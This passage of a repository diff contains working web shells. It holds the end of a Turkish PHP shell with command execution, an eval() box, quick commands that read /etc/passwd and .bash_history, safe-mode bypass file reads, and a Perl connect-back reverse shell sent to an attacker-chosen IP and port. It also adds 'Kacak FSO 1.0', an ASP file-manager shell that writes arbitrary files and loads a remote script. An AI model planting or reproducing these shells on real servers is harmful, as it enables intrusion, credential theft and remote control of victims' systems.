<font color=DeepSkyBlue >".basename($_REQUEST['edit'])."</font> ]</center></b></div><br>";}}function svetxt(){
|
||||
$fp=fopen ($_REQUEST['edit'],"w");if (is_writable($_REQUEST['edit'])){
|
||||
$nedittxt=stripslashes($_REQUEST['edittxt']);
|
||||
fwrite ($fp,$nedittxt);print "<div><b><center>[ <font color=DeepSkyBlue >".basename($_REQUEST['edit'])."</font> Saved !! ]</center></b></div>";fclose($fp);}else {print "<div><b><center>[ Can't save the file !! ]</center></b></div>";}}
|
||||
if ($dlink=='edit'&&!isset ($_REQUEST['edittxt'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])&&!isset($_REQUEST['subqcmnds'])&&!isset($_REQUEST['eval']))
|
||||
{fget($nscdir,$sf,$ef);}elseif (isset ($_REQUEST['edittxt']))
|
||||
{svetxt();fget($nscdir,$sf,$ef);}else {print "";}function owgr($file){
|
||||
$fileowneruid=fileowner($file); $fileownerarray=posix_getpwuid($fileowneruid);
|
||||
$fileowner=$fileownerarray['name']; $fileg=filegroup($file);
|
||||
$groupinfo = posix_getgrgid($fileg);$filegg=$groupinfo['name'];
|
||||
print "$fileowner/$filegg"; }$cpyf=trim($_REQUEST['cpyf']);$ftcpy=trim($_REQUEST['ftcpy']);$cpmv= $cpyf.'/'.$ftcpy;if (isset ($_REQUEST['cpy'])){
|
||||
if (copy($ftcpy,$cpmv)){$cpmvmess=basename($ftcpy)." copied successfully";}else {$cpmvmess="Can't copy ".basename($ftcpy);}}
|
||||
elseif(isset($_REQUEST['mve'])){
|
||||
if (copy($ftcpy,$cpmv)&&unlink ($ftcpy)){$cpmvmess= basename($ftcpy)." moved successfully";}else {$cpmvmess="Can't move ".basename($ftcpy);}
|
||||
}else {$cpmvmess="Kopyala/Tasimak için Dosya Seç";}
|
||||
if (isset ($_REQUEST['safefile'])){
|
||||
$file=$_REQUEST['safefile'];$tymczas="";if(empty($file)){
|
||||
if(empty($_GET['file'])){if(empty($_POST['file'])){
|
||||
print "<center>[ Please choose a file first to read it using copy() ]</center>";
|
||||
} else {$file=$_POST['file'];}} else {$file=$_GET['file'];}}
|
||||
$temp=tempnam($tymczas, "cx");if(copy("compress.zlib://".$file, $temp)){
|
||||
$zrodlo = fopen($temp, "r");$tekst = fread($zrodlo, filesize($temp));
|
||||
fclose($zrodlo);echo "<center><pre>".$sta.htmlspecialchars($tekst).$eta."</pre></center>";unlink($temp);} else {
|
||||
print "<FONT COLOR=\"RED\"><CENTER>Sorry, Can't read the selected file !!
|
||||
</CENTER></FONT><br>";}}if (isset ($_REQUEST['inifile'])){
|
||||
ini_restore("safe_mode");ini_restore("open_basedir");
|
||||
print "<center><pre>".$sta;
|
||||
if (include(htmlspecialchars($_REQUEST['inifile']))){}else {print "Sorry, can't read the selected file !!";}print $eta."</pre></center>";}
|
||||
if (isset ($_REQUEST['bip'])&&isset ($_REQUEST['bport'])){callback($nscdir,$_REQUEST['bip'],$_REQUEST['bport']);}
|
||||
function callback($nscdir,$bip,$bport){
|
||||
if(strstr(php_os,"WIN")){$epath="cmd.exe";}else{$epath="/bin/sh";}
|
||||
if (is_writable($nscdir)){
|
||||
$fp=fopen ("back.pl","w");$backpl='back.pl';}
|
||||
else {$fp=fopen ("/tmp/back.pl","w");$backpl='/tmp/back.pl';}
|
||||
fwrite ($fp,"use Socket;
|
||||
\$system='$epath';
|
||||
\$sys= 'echo \"[ Operating system ][$]\"; echo \"`uname -a`\";
|
||||
echo \"[ Curr DIR ][$]\"; echo \"`pwd`\";echo;
|
||||
echo \"[ User perms ][$]\";echo \"`id`\";echo;
|
||||
echo \"[ Start shell ][$]\";';
|
||||
|
||||
if (!\$ARGV[0]) {
|
||||
exit(1);
|
||||
}
|
||||
\$host = \$ARGV[0];
|
||||
\$port = 80;
|
||||
if (\$ARGV[1]) {
|
||||
\$port = \$ARGV[1];
|
||||
}
|
||||
\$proto = getprotobyname('tcp') || die('Unknown Protocol\n');
|
||||
socket(SERVER, PF_INET, SOCK_STREAM, \$proto) || die ('Socket Error\n');
|
||||
my \$target = inet_aton(\$host);
|
||||
if (!connect(SERVER, pack 'SnA4x8', 2, \$port, \$target)) {
|
||||
die('Unable to Connect\n');
|
||||
}
|
||||
if (!fork( )) {
|
||||
open(STDIN,'>&SERVER');
|
||||
open(STDOUT,'>&SERVER');
|
||||
open(STDERR,'>&SERVER');
|
||||
print '\n[ Bk-Code shell by Black-Code :: connect back backdoor by Crash_over_ride ]';
|
||||
print '\n[ A-S-T team ][ Lezr.com ]\n\n';
|
||||
system(\$sys);system (\$system);
|
||||
exit(0); }
|
||||
");callfuncs("chmod 777 $backpl");
|
||||
ob_start();
|
||||
callfuncs("perl $backpl $bip $bport");
|
||||
ob_clean();
|
||||
print "<div><b><center>[ Selected IP is ".$_REQUEST['bip']." and port is ".$_REQUEST['bport']." ]<br>
|
||||
[ Check your connection now, if failed try changing the port number ]<br>
|
||||
[ Or Go to a writable dir and then try to connect again ]<br>
|
||||
[ Return to the Current dir ] [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]
|
||||
</div><br>";}if (isset($_REQUEST['uback'])){
|
||||
$uback=$_REQUEST['uback'];$upip=$_REQUEST['upip'];
|
||||
if ($_REQUEST['upports']=="up80"){callfuncs("perl $uback $upip 80");}
|
||||
elseif ($_REQUEST['upports']=="up443"){callfuncs("perl $uback $upip 443");}
|
||||
elseif ($_REQUEST['upports']=="up2121"){callfuncs("perl $uback $upip 2121");}}
|
||||
delm("# Komut ÇAlistir #");print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100% height=18%>";
|
||||
print "<tr><td width=32%><div align=left>";
|
||||
print $st.$c1."<center><div><b>".$mess3.$ec;
|
||||
print $c2.$sf."<center>";input("text","cfile","",53);
|
||||
input("hidden","scdir",$nscdir,0);print "<br>";
|
||||
input("submit","crefile","Olustur","");
|
||||
print " ";input("submit","delfile","Sil","");
|
||||
print "</center>".$ef.$ec.$et."</div></td>";
|
||||
print "<td><div align=center>".$st.$c1;
|
||||
print "<center><div><b>Enter the command to execute";print $ec;
|
||||
print $c2.$sf."<center><div style='margin-top:7px'>";
|
||||
input("text","cmd","",59);input("hidden","scdir",$nscdir,0);print"<br>";
|
||||
input("submit","","Execute","");print "</center>".$ef.$ec.$et."</div></td>";
|
||||
print "<td width=32%><div align=right>";print $st.$c1;
|
||||
print "<center><div><b>$mess".$ec.$c2.$sf."<center>";
|
||||
input("text","dir","",53);input("hidden","scdir",$nscdir,0);print "<br>";
|
||||
input("submit","credir","Create-D","");print " ";
|
||||
input("submit","deldir","Delete-D","");
|
||||
print "</center>".$ef.$ec.$et."</div></td></tr>";
|
||||
print "<tr><td width=32%><div align=left>";print $st.$c1;
|
||||
print "<center><div><b>Dosya Düzenle/Oku".$ec;print $c2.$sf."<center>";
|
||||
input("text","rfile",$nscdir,53);input("hidden","scdir",$nscdir,0);print "<br>";
|
||||
input("submit","","Oku-Düzenle","");print "</center>".$ef.$ec.$et."</div></td>";
|
||||
print "<td><div align=center>";print $st.$c1;
|
||||
print "<center><div><b>Dizin'i Göster<br>";print $ec.$c2.$sf."<center><div style='margin-top:7px'>"; input("text","scdir",$nscdir,59);print"<br>";
|
||||
input("submit","","Göster","");print " ";
|
||||
input("reset","","R00T","");print "</center>".$ef.$ec.$et."</div></td>";
|
||||
print "<td><div align=center>";print $st.$c1;
|
||||
print "<center><div><b>Dosya Boyutu : ".filesize($upfile)." in ( B/Kb )";print $ec.$c2."<form method=post Enctype=multipart/form-data><center>";
|
||||
input("file","upfile","",40);input("hidden","scdir",$nscdir,0);
|
||||
input("hidden","up",$nscdir,0);
|
||||
print"<br>";input("submit","","Upload","");print "</center>".$ef.$ec.$et."</div></td></tr>";
|
||||
delm("");print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";print "<tr><td width=50%><div align=left>";
|
||||
print $st.$c1."<div><b><center>Execute php code with eval()</div>";
|
||||
print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0);
|
||||
print " <textarea cols=73 rows=3 name=eval>";
|
||||
if(!isset($evsub)){print "//system('id'); //readfile('/etc/passwd'); //passthru('pwd');";}else{print htmlspecialchars(stripslashes($eval));}
|
||||
print "</textarea><br><center>";
|
||||
input('submit','evsub','Execute');print " ";
|
||||
input('Reset','','Reset');print " ";
|
||||
print "</center>".$ec.$ef.$et;
|
||||
print "</td><td height=20% width=50%><div align=center>";
|
||||
print $st.$c1."<div><b><center>Execute useful commands</div>";
|
||||
print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0);
|
||||
print "<center><select style='width:60%' name=uscmnds size=1>
|
||||
<option value='op0'>Execute quick commands</option>
|
||||
<option value='op1'>ls -lia</option>
|
||||
<option value='op2'>/etc/passwd</option>
|
||||
<option value='op3'>/var/cpanel/accounting.log</option>
|
||||
<option value='op4'>/var/named</option>
|
||||
<option value='op11'>Perms in curr Dir</option>
|
||||
<option value='op12'>Perms in main Dir</option>
|
||||
<option value='op5'>Find service.pwd files</option>
|
||||
<option value='op6'>Find config files</option>
|
||||
<option value='op7'>Find .bash_history files</option>
|
||||
<option value='op8'>Read hosts file</option>
|
||||
<option value='op9'>Root login</option>
|
||||
<option value='op10'>Show opened ports</option>
|
||||
<option value='op13'>Show services</option>
|
||||
</select> ";print"<input type=submit name=subqcmnds value=Execute style='height:20'> <input type=reset value=Return style='height:20'></center>";
|
||||
print $ec.$ef.$et."</td></tr></table>";delm("");
|
||||
print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
|
||||
print "<tr><td width=50%><div align=left>";
|
||||
print $st.$c1."<div><b><center>".$cpmvmess."</div>";
|
||||
print $ec.$c2.$sf." ";input("text","ftcpy","File-name",15);
|
||||
print "<b><font face=tahoma size=2> To </b>";
|
||||
input("text","cpyf",$nscdir,45);input("hidden","scdir",$nscdir,0);print " ";
|
||||
input("submit","cpy","Copy","");print " ";input("submit","mve","Move","");
|
||||
print "</center>".$ec.$ef.$et;
|
||||
print "</td><td height=20% width=50%><div align=right>";
|
||||
print $st.$c1."<div><b><center>Cok kullanilan Komutlar</div>";
|
||||
print $ec.$c2.$sf." ";input("hidden","scdir",$nscdir,0);
|
||||
print "<select style='width:22%' name=ustools size=1>
|
||||
<option value='t1'>Wget</option><option value='t2'>Curl</option>
|
||||
<option value='t3'>Lynx</option><option value='t9'>Get</option>
|
||||
<option value='t4'>Unzip</option><option value='t5'>Tar</option>
|
||||
<option value='t6'>Tar.gz</option><option value='t7'>Chmod 777</option>
|
||||
<option value='t8'>Make</option></select> ";input('text','ustname','',51);print " ";input('submit','ustsub','Execute');print "</center>".$ec.$ef.$et;
|
||||
print "</td></tr></table>";delm(": Safe mode bypass :");
|
||||
print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
|
||||
print "<tr><td width=50%><div align=left>";
|
||||
print $st.$c1."<div><b><center>Using copy() function</div>";
|
||||
print $ec.$c2.$sf." ";input("text","safefile",$nscdir,75);
|
||||
input("hidden","scdir",$nscdir,0);print " ";
|
||||
input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
|
||||
print "</td><td height=20% width=50%><div align=right>";
|
||||
print $st.$c1."<div><b><center>Using ini_restore() function</div>";
|
||||
print $ec.$c2.$sf." ";input("text","inifile",$nscdir,75);
|
||||
input("hidden","scdir",$nscdir,0);print " ";
|
||||
input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
|
||||
print "</td></tr></table>";delm("# Backdoor Baglantisi #");
|
||||
print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
|
||||
print "<tr><td width=50%><div align=left>";
|
||||
print $st.$c1."<div><b><center>Backdoor ile Baglan</div>";
|
||||
print $ec.$c2.$sf." ";input("text","bip",$REMOTE_ADDR,47);print " ";
|
||||
input("text","bport",80,10);input("hidden","scdir",$nscdir,0);print " ";
|
||||
input("submit","","Connect","");print " ";input("reset","","Reset","");
|
||||
print "</center>".$ec.$ef.$et;print "</td><td height=20% width=50%><div align=right>";print $st.$c1."<div><b><center>Yüklenmis Backdoor</div>";
|
||||
print $ec.$c2.$sf." ";print "<select style='width:15%' name=upports size=1>
|
||||
<option value='up80'>80</option><option value='up443'>443</option>
|
||||
<option value='up2121'>2121</option></select>";print " ";
|
||||
input("text","uback","back.pl",23);print " ";
|
||||
input("text","upip",$REMOTE_ADDR,29);print " ";input("submit","subupb","Connect");
|
||||
print "</center>".$ec.$ef.$et;print "</td></tr></table>";
|
||||
print "<br><table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>"; print"<tr><td><font size=2 face=tahoma>";
|
||||
print"<center>Copyright is reserved to Ekin0x <br>[ By Cyber Security TIM Go to : <a target='_blank' href='http://www.cyber-warrior.org'>www.cyber-warrior.org</a> ]";
|
||||
print"</font>
|
||||
</td></tr></table>";
|
||||
?>
|
903
php/kacak.php
Normal file
903
php/kacak.php
Normal file
|
@ -0,0 +1,903 @@
|
|||
<html>
|
||||
<center><h3>www.kacaq.blogspot.com</h3> || By Kacak || <h1>BuqX@HotMail.Com</h1></center>
|
||||
<head>
|
||||
<meta http-equiv="Content-Language" content="tr">
|
||||
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
|
||||
<meta name="ProgId" content="FrontPage.Editor.Document">
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
|
||||
<title>Kacak FSO 1.0 / GrayHatz Hacking Team - Terrorist Crew - TurkGuvenligi Priv8 Team / GrayHatz.Org ~ TurkGuvenligi.Ýnfo</title>
|
||||
</head>
|
||||
|
||||
<body topmargin="0" leftmargin="0" bgcolor="#EAEAEA">
|
||||
|
||||
<script language="JavaScript">
|
||||
<!--
|
||||
function MM_openBrWindow(theURL,winName,features) { //v2.0
|
||||
window.open(theURL,winName,features);
|
||||
}
|
||||
//-->
|
||||
</script>
|
||||
|
||||
<%
|
||||
if request.querystring("TGH") = "1" then
|
||||
on error resume next
|
||||
es=request.querystring("Kacak")
|
||||
diez=server.urlencode(left(es,(instrRev(es,"\"))-1))
|
||||
|
||||
Select case es
|
||||
case "C:" diez="C:"
|
||||
case "D:" diez="D:"
|
||||
end select
|
||||
|
||||
|
||||
|
||||
|
||||
%>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<body topmargin="0" leftmargin="0"
|
||||
onLoad="location.href='?klas=<%=diez%>&usak=1'">
|
||||
|
||||
<%
|
||||
else
|
||||
%>
|
||||
|
||||
|
||||
|
||||
<%
|
||||
if request.querystring("Dosyakaydet") <> "" then
|
||||
set kaydospos=createobject("scripting.filesystemobject")
|
||||
set kaydoses=kaydospos.createtextfile(request.querystring("dosyakaydet") & request("dosadi"))
|
||||
set kaydoses=nothing
|
||||
set kaydospos=nothing
|
||||
set kaydospos=createobject("scripting.filesystemobject")
|
||||
set kaydoses=kaydospos.opentextfile(request.querystring("dosyakaydet") & request("dosadi"), 2, true)
|
||||
kaydoses.write request("duzenx")
|
||||
set kaydoses=nothing
|
||||
set kaydospos=nothing
|
||||
end if
|
||||
%>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<%
|
||||
if request.querystring("yenidosya") <> "" then
|
||||
%>
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
|
||||
<tr>
|
||||
<td width="70" bgcolor="#000000" height="76">
|
||||
<p align="center">
|
||||
<img border="0" src="http://www.grayhatz.org/forum/dragontwo/logo.jpg"></td>
|
||||
<td width="501" bgcolor="#000000" height="76" valign="top">
|
||||
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
|
||||
<SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT>
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
TC & GH & TC TEAM ©<br>
|
||||
</span>Terrorist Crew - GrayHatz Hacking Team - TurkGuvenligi Priv8 Team<br>
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
KACAK FSO 1.0</span></font></td>
|
||||
<td width="431" bgcolor="#000000" height="76" valign="top">
|
||||
<p align="right"><span style="font-weight: 700">
|
||||
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
|
||||
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
|
||||
<a href="http://www.grayhatz.org ~ http://www.turkguvenligi.info" style="text-decoration: none">
|
||||
<font color="#858585">GrayHatz ~ TurkGuvenligi.Ýnfo</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> <br>
|
||||
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
|
||||
<a href="mailto:BuqX@hotmail.com" style="text-decoration: none">
|
||||
<font color="#858585">BuqX</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:BuqX@hotmail.com" style="text-decoration: none"><font color="#858585">@GrayHatz ~ TurkGuvenligi.Ýnfo</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> </font></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
|
||||
<tr>
|
||||
<td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
|
||||
<span style="font-size: 8pt"> Çalýþýlan Klasör</span></font></td>
|
||||
<td bgcolor="#D6D6D6" height="20">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
|
||||
<tr>
|
||||
<td width="1"></td>
|
||||
<td><font face="Verdana" style="font-size: 8pt"> <%=response.write(request.querystring("yenidosya"))%></font></td>
|
||||
<td width="65">
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#000000"> </td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#B7B7B7">
|
||||
<form method="POST" action="?dosyakaydet=<%=request.querystring("yenidosya")%>&klas=<%=request.querystring("yenidosya")%>" name="kaypos">
|
||||
<p align="center"><b><font size="1" face="Verdana">
|
||||
<br>
|
||||
Dosya Adý : <br>
|
||||
</font>
|
||||
</b><font
|
||||
color="#FFFFFF" size="1" face="Arial">
|
||||
<input
|
||||
type="text" size="97" maxlength="32"
|
||||
name="dosadi" value="Dosya Adý"
|
||||
class="search"
|
||||
onblur="if (this.value == '') this.value = 'Kullanýcý'"
|
||||
onfocus="if (this.value == 'Kullanýcý') this.value=''"
|
||||
style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"><br>
|
||||
<br>
|
||||
</font>
|
||||
<b><font size="1" face="Verdana">
|
||||
Ýçerik : <br>
|
||||
</font>
|
||||
<font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red">
|
||||
<textarea name="duzenx"
|
||||
style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
|
||||
|
||||
|
||||
rows="24" cols="95" wrap="OFF"><%=sedx%></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
|
||||
<br>
|
||||
</font></b>
|
||||
<span class="gensmall">
|
||||
<input type="submit" size="16"
|
||||
name="duzenx1" value="Oluþtur"
|
||||
style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
|
||||
</span></p>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber19">
|
||||
<tr>
|
||||
<td width="100%" align="right" bgcolor="#000000">
|
||||
<p align="center">
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</form>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#EAEAEA">
|
||||
<p align="right">
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
<%
|
||||
else
|
||||
%>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<%
|
||||
if request.querystring("klasorac") <> "" then
|
||||
|
||||
set doses=createobject("scripting.filesystemobject")
|
||||
set es=doses.createfolder(request.querystring("aktifklas") & request("duzenx"))
|
||||
set es=nothing
|
||||
set doses=nothing
|
||||
|
||||
|
||||
end if
|
||||
%>
|
||||
|
||||
<%
|
||||
if request.querystring("klasac") <> "" then
|
||||
|
||||
set aktifklas=request.querystring("aktifklas")
|
||||
|
||||
|
||||
%>
|
||||
<td width="65" bgcolor="#000000" height="76">
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber25" height="59">
|
||||
<tr>
|
||||
<td width="70" bgcolor="#000000" height="76">
|
||||
<p align="center">
|
||||
<img border="0" src="http://www.grayhatz.org/forum/dragontwo/logo.jpg"></td>
|
||||
<td width="501" bgcolor="#000000" height="76" valign="top">
|
||||
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
<center>TC & GH & TC TEAM ©<br>
|
||||
</span>Terrorist Crew - GrayHatz Hacking Team - TurkGuvenligi Priv8 Team<br>
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
KACAK FSO 1.0</span></font></td>
|
||||
<td width="431" bgcolor="#000000" height="76" valign="top">
|
||||
<p align="right"><span style="font-weight: 700">
|
||||
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
|
||||
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
|
||||
<a href="http://www.grayhatz.org ~ http://www.turkguvenligi.info" style="text-decoration: none">
|
||||
<font color="#858585">GrayHatz ~ TurkGuvenligi.Ýnfo</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> <br>
|
||||
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
|
||||
<a href="mailto:BuqX@hotmail.com" style="text-decoration: none">
|
||||
<font color="#858585">BuqX</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:BuqX@hootmail.com" style="text-decoration: none"><font color="#858585">@Hotmail.com</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> </font></td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
|
||||
<tr>
|
||||
<td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
|
||||
<span style="font-size: 8pt"> Çalýþýlan Alan</span></font></td>
|
||||
<td bgcolor="#D6D6D6" height="20">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
|
||||
<tr>
|
||||
<td width="1"></td>
|
||||
<td><font face="Verdana" style="font-size: 8pt"> <%=aktifklas%></font></td>
|
||||
<td width="65">
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="174">
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#000000" height="19"> </td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#C5C5C5" height="134">
|
||||
<form method="POST" action="?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%>" name="klaspos">
|
||||
<p align="center"><font
|
||||
color="#FFFFFF" size="1" face="Arial">
|
||||
<input
|
||||
type="text" size="37" maxlength="32"
|
||||
name="duzenx" value="Klasör Adý"
|
||||
class="search"
|
||||
onblur="if (this.value == '') this.value = 'Kullanýcý'"
|
||||
onfocus="if (this.value == 'Kullanýcý') this.value=''"
|
||||
style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center">
|
||||
<br>
|
||||
<br>
|
||||
<br>
|
||||
</font>
|
||||
<span class="gensmall">
|
||||
<input type="submit" size="16"
|
||||
name="duzenx1" value="Oluþtur"
|
||||
style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
|
||||
</span></span><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
|
||||
</font></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#000000" height="19"> </td>
|
||||
</tr>
|
||||
<tr>
|
||||
|
||||
|
||||
<%
|
||||
else
|
||||
%>
|
||||
|
||||
|
||||
|
||||
<%
|
||||
if request.querystring("suruculer") <> "" then
|
||||
%>
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
|
||||
<tr>
|
||||
<td width="70" bgcolor="#000000" height="76">
|
||||
<p align="center">
|
||||
<img border="0" src="http://www.grayhatz.org/forum/dragontwo/logo.jpg"></td>
|
||||
<td width="501" bgcolor="#000000" height="76" valign="top">
|
||||
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
TC & GH & TC TEAM ©<br>
|
||||
</span>Terrorist Crew - GrayHatz Hacking Team - TurkGuvenligi Priv8 Team<br>
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
KACAK FSO 1.0</span></font></td>
|
||||
<td width="431" bgcolor="#000000" height="76" valign="top">
|
||||
<p align="right"><span style="font-weight: 700">
|
||||
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
|
||||
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
|
||||
<a href="http://www.grayhatz.org ~ http://www.turkguvenligi.info" style="text-decoration: none">
|
||||
<font color="#858585">www.GrayHatz ~ TurkGuvenligi.Ýnfo</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> <br>
|
||||
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
|
||||
<a href="mailto:BuqX@hotmail.com" style="text-decoration: none">
|
||||
<font color="#858585">BuqX</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:BuqX@hootmail.com" style="text-decoration: none"><font color="#858585">@Hotmail.com</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> </font></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="4">
|
||||
<tr>
|
||||
<td width="110" bgcolor="#9F9F9F" height="4">
|
||||
<span style="font-size: 2pt"> </span></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="153">
|
||||
<tr>
|
||||
<td width="100%" height="19" bgcolor="#000000"> </td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="100%" height="113" bgcolor="#E1E1E1"> <div align="center">
|
||||
<center>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="484" id="AutoNumber2" height="17">
|
||||
<tr>
|
||||
<td width="208" height="17" align="center" bgcolor="#C5C5C5">
|
||||
<font face="Verdana" style="font-size: 8pt">Sürücü Adý</font></td>
|
||||
<td width="75" height="17" align="center" bgcolor="#C5C5C5">
|
||||
<font face="Verdana" style="font-size: 8pt">Boyutu</font></td>
|
||||
<td width="75" height="17" align="center" bgcolor="#C5C5C5">
|
||||
<font face="Verdana" style="font-size: 8pt">Boþ Alan</font></td>
|
||||
<td width="64" height="17" align="center" bgcolor="#C5C5C5">
|
||||
<font face="Verdana" style="font-size: 8pt">Durum</font></td>
|
||||
<td width="62" height="17" align="center" bgcolor="#C5C5C5">
|
||||
<font face="Verdana" style="font-size: 8pt">Ýþlem</font></td>
|
||||
</tr>
|
||||
</table>
|
||||
</center>
|
||||
</div>
|
||||
<div align="center">
|
||||
<center>
|
||||
|
||||
|
||||
<%
|
||||
set klassis =server.createobject("scripting.filesystemobject")
|
||||
